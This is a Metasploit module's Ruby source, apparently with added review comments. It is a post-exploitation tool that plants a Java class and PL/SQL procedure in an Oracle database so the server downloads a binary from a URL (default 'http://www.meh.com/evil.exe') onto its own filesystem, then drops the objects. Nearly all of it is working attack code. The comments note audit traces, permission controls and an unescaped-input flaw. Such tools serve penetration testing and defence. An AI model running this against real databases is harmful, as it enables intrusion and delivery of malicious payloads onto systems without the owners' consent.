rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::ORACLE

  # Registers the module metadata and its two options (URL and COPYTO).
  #
  # The Notes entry declares IOC_IN_LOGS and ARTIFACTS_ON_DISK as side
  # effects; #run shows where they presumably come from: the DDL statements
  # it issues and the file written at COPYTO.
  #
  # @param info [Hash] metadata passed through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Oracle URL Download',
        'Description' => %q{
          This module will create a Java class which enables the download
          of a binary from a webserver to the Oracle filesystem.
        },
        'Author' => ['CG'],
        'License' => MSF_LICENSE,
        'References' => [
          ['URL', 'http://www.argeniss.com/research/oraclesqlinj.zip'],
        ],
        'DisclosureDate' => '2005-02-10',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('URL', [false, 'The URL to download the binary from.', 'http://www.meh.com/evil.exe']),
        OptString.new('COPYTO', [false, 'Location to copy the binary to', 'c:\\meh.exe']),
      ]
    )
  end

  # Stores a Java class in the database, wraps it in a PL/SQL procedure,
  # calls that procedure with COPYTO and URL, then drops both objects.
  #
  # Footprint of a run, as far as this file shows:
  # - DDL that creates and later drops SRC_FILE_UPLOAD and PROC_FILEUPLOAD;
  # - the file written at COPYTO, which nothing in this module removes;
  # - a URLConnection opened by the stored Java code towards URL.
  # The fixed object names and the "as language java" procedure are the
  # stable strings to search for in database audit data.
  #
  # Whether the stored class is allowed to reach the filesystem or network
  # depends on what the connecting account has been granted, which is not
  # visible here. Keeping Java source creation and Java file/socket
  # permissions away from application accounts is the usual control;
  # confirm the details for the Oracle release in use.
  #
  # NOTE(review): only the first statement is wrapped in a rescue. An
  # exception raised by any later prepare_exec call propagates, and the two
  # DROP statements are then never reached, so the objects stay in the
  # schema.
  # NOTE(review): COPYTO and URL are interpolated into the PL/SQL block
  # without escaping; a single quote in either value changes the statement.
  #
  # @return [Object, nil] whatever the last prepare_exec call returns, or
  #   nil when the run stops early
  def run
    # check_dependencies is defined outside this file; stop when it is falsy.
    return unless check_dependencies

    destination = datastore['COPYTO']
    source_url = datastore['URL']

    # Java source stored in the database. It copies the URL's response body
    # to the target path in 1024-byte chunks. The BufferedReader it declares
    # is never read; the bytes go through the raw InputStream.
    java_source_ddl = <<~JAVA_DDL
      CREATE OR REPLACE JAVA SOURCE NAMED SRC_FILE_UPLOAD AS
      import java.lang.*;
      import java.io.*;
      public class FileUpload
      {
      public static void fileUpload(String myFile, String url) throws IOException
      {
      File binaryFile = new File(myFile);
      FileOutputStream outStream = new FileOutputStream(binaryFile);
      java.net.URL u = new java.net.URL(url);
      java.net.URLConnection uc = u.openConnection();
      InputStream is = (InputStream)uc.getInputStream();
      BufferedReader in = new BufferedReader (new InputStreamReader (is));
      byte buffer[] = new byte[1024];
      int length = -1;
      while ((length = is.read(buffer)) != -1) {
      outStream.write(buffer, 0, length);
      outStream.flush();
      }
      is.close(); outStream.close();
      }
      };;
    JAVA_DDL

    # PL/SQL call spec that exposes FileUpload.fileUpload as a procedure.
    procedure_ddl = <<~PROC_DDL
      CREATE OR REPLACE PROCEDURE PROC_FILEUPLOAD (p_file varchar2, p_url varchar2)
      as language java
      NAME 'FileUpload.fileUpload (java.lang.String, java.lang.String)';
    PROC_DDL

    invoke_sql = "begin PROC_FILEUPLOAD ('#{destination}', '#{source_url}'); end;"
    drop_source_sql = 'drop java source SRC_FILE_UPLOAD'
    drop_procedure_sql = 'drop procedure PROC_FILEUPLOAD'

    # Announce a step, then run its statement. The lambda returns the
    # prepare_exec result so the method's return value is unchanged.
    step = lambda do |message, statement|
      print_status(message)
      prepare_exec(statement)
    end

    begin
      step.call("Creating java source 'SRC_FILE_UPLOAD'...", java_source_ddl)
    rescue StandardError
      # Nothing is reported here; the run just ends.
      return
    end

    step.call("Creating procedure 'PROC_FILEUPLOAD'...", procedure_ddl)
    step.call("Trying to download binary from #{source_url} to #{destination}", invoke_sql)
    step.call("Removing java source 'SRC_FILE_UPLOAD'...", drop_source_sql)
    step.call("Removing procedure 'PROC_FILEUPLOAD'...", drop_procedure_sql)
  end
end